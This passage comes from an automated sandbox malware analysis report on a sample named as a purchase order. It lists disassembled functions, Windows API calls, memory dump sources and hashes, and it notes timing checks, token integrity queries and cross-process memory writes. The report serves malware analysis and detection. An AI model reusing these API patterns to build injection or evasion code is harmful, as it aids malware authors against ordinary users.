                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 842720411-0
                      • Opcode ID: 3cafab21b492c0576ce466b89d9fcb5f5911ceb293f07ef5cd0df20e82db00bd
                      • Instruction ID: 7260b4113752d9fc30ac54990b7b8f02ad0bc6f42d2e3363f1f57143a0dda5ed
                      • Opcode Fuzzy Hash: 3cafab21b492c0576ce466b89d9fcb5f5911ceb293f07ef5cd0df20e82db00bd
                      • Instruction Fuzzy Hash: A1016971211208BFDB114FA5DC89EAB3BADEF8A764B504429F945D3260DF768C50DEB0
                      Function 00AD8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8371
                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD837F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8387
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD8391
                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: PerformanceQuery$CounterSleep$Frequency
                      • String ID:
                      • API String ID: 2833360925-0
                      • Opcode ID: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                      • Instruction ID: 102b5be0eabdcf5c93516de384bf674b2a579c1c57e66c9d019e4f10286ecb8f
                      • Opcode Fuzzy Hash: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                      • Instruction Fuzzy Hash: 08018C35C00619EBCF00AFA9ED48AEEBB78FF08B01F400042E506B7250CF789A60C7A1
                      Function 00ACA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                      Download Yara Rule
                      APIs
                      • CLSIDFromProgID.OLE32 ref: 00ACA874
                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00ACA88F
                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00ACA8AD
                      • CLSIDFromString.OLE32(?,?), ref: 00ACA8B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: From$Prog$FreeStringTasklstrcmpi
                      • String ID:
                      • API String ID: 3897988419-0
                      • Opcode ID: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                      • Instruction ID: 38e4ec63544c54f6787f5d6b435fb1b46fb5341b883ac6cd739fd30ecd99800d
                      • Opcode Fuzzy Hash: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                      • Instruction Fuzzy Hash: 7A014B76600218EFDB115F68EC84BAABBBDEF54799F158428B901D3210DB70DD419BA1
                      Function 00ACB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ACB7A5
                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ACB7AF
                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ACB7BE
                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00ACB7C5
                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ACB7DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                      • Instruction ID: 734bda5f732ae06615e42d70abfc479fe2830dfa585102a558899dce4417595b
                      • Opcode Fuzzy Hash: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                      • Instruction Fuzzy Hash: E4F0AF752412547FEB100FA4AC89FA73BACFF8A755F408019F950C7150CB619C018A70
                      Function 00ACB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ACB806
                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB810
                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB81F
                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB826
                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB83C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapInformationToken$AllocErrorLastProcess
                      • String ID:
                      • API String ID: 44706859-0
                      • Opcode ID: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                      • Instruction ID: d826f8f89077748ac8adf52facfb8f32e59748bbb68543b0180f48d855da62a2
                      • Opcode Fuzzy Hash: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                      • Instruction Fuzzy Hash: 8AF03775210214AFEB215FA5EC99FAB3B6CFF4A754F008029F941D7150CFA198518B70
                      Function 00ACFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACFA8F
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ACFAA6
                      • MessageBeep.USER32(00000000), ref: 00ACFABE
                      • KillTimer.USER32(?,0000040A), ref: 00ACFADA
                      • EndDialog.USER32(?,00000001), ref: 00ACFAF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 42bd695c1e943394f0c47d8b086dc899ed362fd473c169b7e1bae3ad87d9ed9b
                      • Instruction ID: d97e0c5f2295b8ef5c84db6954dfc6a0cd1bb9f56bd20ce18c17ab2acc050ae0
                      • Opcode Fuzzy Hash: 42bd695c1e943394f0c47d8b086dc899ed362fd473c169b7e1bae3ad87d9ed9b
                      • Instruction Fuzzy Hash: 29018130500704AFEB259B14DD4EFD6B7BABB10B49F45416DB587A60E0DBF4A9448A50
                      Function 00AAB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • EndPath.GDI32(?), ref: 00AAB526
                      • StrokeAndFillPath.GDI32(?,?,00B0F583,00000000,?), ref: 00AAB542
                      • SelectObject.GDI32(?,00000000), ref: 00AAB555
                      • DeleteObject.GDI32 ref: 00AAB568
                      • StrokePath.GDI32(?), ref: 00AAB583
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                      • Instruction ID: e9b8deebff220724ed2c364bcbaba663ec5eb60f00ab9ae75d814617a1ecaf22
                      • Opcode Fuzzy Hash: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                      • Instruction Fuzzy Hash: 34F0EC30450705EBDB255F69ED0C7A43FE5B702327F548654E4AA8B1F1CB3489A5DF20
                      Function 00ADFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00ADFAB2
                      • CoCreateInstance.OLE32(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADFACA
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • CoUninitialize.OLE32 ref: 00ADFD2D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_memmove
                      • String ID: .lnk
                      • API String ID: 2683427295-24824748
                      • Opcode ID: a3419ba7e8031d4d13837455028147eb5d78aa4c1d7c3cc88f6674b2757ace26
                      • Instruction ID: 9c15fad10a67814eddd2b086eb9eca570320ec69fa6d78ba587cd4897ba751f4
                      • Opcode Fuzzy Hash: a3419ba7e8031d4d13837455028147eb5d78aa4c1d7c3cc88f6674b2757ace26
                      • Instruction Fuzzy Hash: 5CA15D71604305AFC700EF64C991EABB7EDEF99704F40491DF1569B1A1EB70EA09CBA2
                      Function 00ADEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00AD78CB
                      • CoInitialize.OLE32(00000000), ref: 00ADF04D
                      • CoCreateInstance.OLE32(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADF066
                      • CoUninitialize.OLE32 ref: 00ADF083
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                      • String ID: .lnk
                      • API String ID: 2126378814-24824748
                      • Opcode ID: ad3a3e0041d77b2a8acf740670bf52efe0729897fed77ebaf19c85763382adc3
                      • Instruction ID: cff92b7e7b78ece1b9b8cc0ef5a103a31ba70cc86fc3eab3569b965a70bf4a5c
                      • Opcode Fuzzy Hash: ad3a3e0041d77b2a8acf740670bf52efe0729897fed77ebaf19c85763382adc3
                      • Instruction Fuzzy Hash: 26A15575604301AFCB10DF14C984E5ABBE5FF89320F148999F99A9B3A2CB31ED45CB91
                      Function 00AB3EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00AB3F7D
                        • Part of subcall function 00ABEE80: __87except.LIBCMT ref: 00ABEEBB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorHandling__87except__start
                      • String ID: pow
                      • API String ID: 2905807303-2276729525
                      • Opcode ID: b5dd0bc41df8a16ab95753c7238bfdf3cfdb5cecc4028f2998f5be699ced8866
                      • Instruction ID: 0dc1a205b84ecda453a6c232fa44438a8b75d0a19fddb54ba2bc86cae8ce0533
                      • Opcode Fuzzy Hash: b5dd0bc41df8a16ab95753c7238bfdf3cfdb5cecc4028f2998f5be699ced8866
                      • Instruction Fuzzy Hash: F7512B32E0820296DF15B738CD413FA6BBC9B40710F248969F4968A1ABEF35CDD5D647
                      Function 00AADA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: #$+
                      • API String ID: 0-2552117581
                      • Opcode ID: 3b010962832c55b2d565c6d712329b98b421414be91d99e3d0c894aa25c7aa16
                      • Instruction ID: d1812cc20e156dc930bbb69c2f6725dc5bfb31f8f492c87c4791b874f34213d6
                      • Opcode Fuzzy Hash: 3b010962832c55b2d565c6d712329b98b421414be91d99e3d0c894aa25c7aa16
                      • Instruction Fuzzy Hash: 54511EB4604246CFDF11EF68C495AFA7BE4EF26310F144099FA929B2E0D7309D46CB20
                      Function 00AD503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B2DC40,?,0000000F,0000000C,00000016,00B2DC40,?), ref: 00AD507B
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A9B8A7: _memmove.LIBCMT ref: 00A9B8FB
                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AD50FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper$__itow__swprintf_memmove
                      • String ID: REMOVE$THIS
                      • API String ID: 2528338962-776492005
                      • Opcode ID: 3f81fbfdc98f5af15624eeb4153eb6a8cd89c7b3d6f6d468d846f52e42acbcd3
                      • Instruction ID: 62efb08cc4a7a08a025426840d86854a0a6e5067581d0861e2bfb575e0358bf5
                      • Opcode Fuzzy Hash: 3f81fbfdc98f5af15624eeb4153eb6a8cd89c7b3d6f6d468d846f52e42acbcd3
                      • Instruction Fuzzy Hash: 08417F35A00609AFCF05EF64C981AAEB7F5BF49304F04816AF856AB392DB349D41CB50
                      Function 00ACCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACC9FE,?,?,00000034,00000800,?,00000034), ref: 00AD4D6B
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ACCFC9
                        • Part of subcall function 00AD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AD4D36
                        • Part of subcall function 00AD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00AD4C90
                        • Part of subcall function 00AD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CA0
                        • Part of subcall function 00AD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CB6
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD036
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD083
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                      • Instruction ID: 18b8890b91baeb8cc75bd9f3c069f00559e07d110256702948fa64ebb082f309
                      • Opcode Fuzzy Hash: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                      • Instruction Fuzzy Hash: C9413E76900218BFDB10DFA4CD85FDEBBB8EF49700F108099EA56B7191DA706E45CB61
                      Function 00AFA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2DBF0,00000000,?,?,?,?), ref: 00AFA4E6
                      • GetWindowLongW.USER32 ref: 00AFA503
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AFA513
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                      • Instruction ID: 5d20b04675314faccf8c610c182e9c8c4623ccead32a42994517bfec790a87ed
                      • Opcode Fuzzy Hash: 4f4c4b33a262bcfa7a36344cda981052f7a606338ad81f954eeb301867bd33ba
                      • Instruction Fuzzy Hash: D531B271240609AFDB218F78CC45BE67BA9EF59334F248715F979932E0D770E8509B50
                      Function 00AFA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AFA74F
                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AFA75D
                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AFA764
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$DestroyWindow
                      • String ID: msctls_updown32
                      • API String ID: 4014797782-2298589950
                      • Opcode ID: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                      • Instruction ID: 33793160c703fbcd96ad1ac5cc824f9412307aafe6515a26084339c58f0239eb
                      • Opcode Fuzzy Hash: e20046586cc244c5ef61237551334bcfeca4d02835cab476184d3bc65a0c845b
                      • Instruction Fuzzy Hash: 182151B5A00209AFDB10EF68CCC1EB737ADEB5A394B040459FA05D7351CB70EC11DA61
                      Function 00AF97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF983D
                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF984D
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF9872
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$MoveWindow
                      • String ID: Listbox
                      • API String ID: 3315199576-2633736733
                      • Opcode ID: 8abb06159dfa0a7f2a96e5ce5281da3e18a9b5d6c2d102e7991a2a1525d1c204
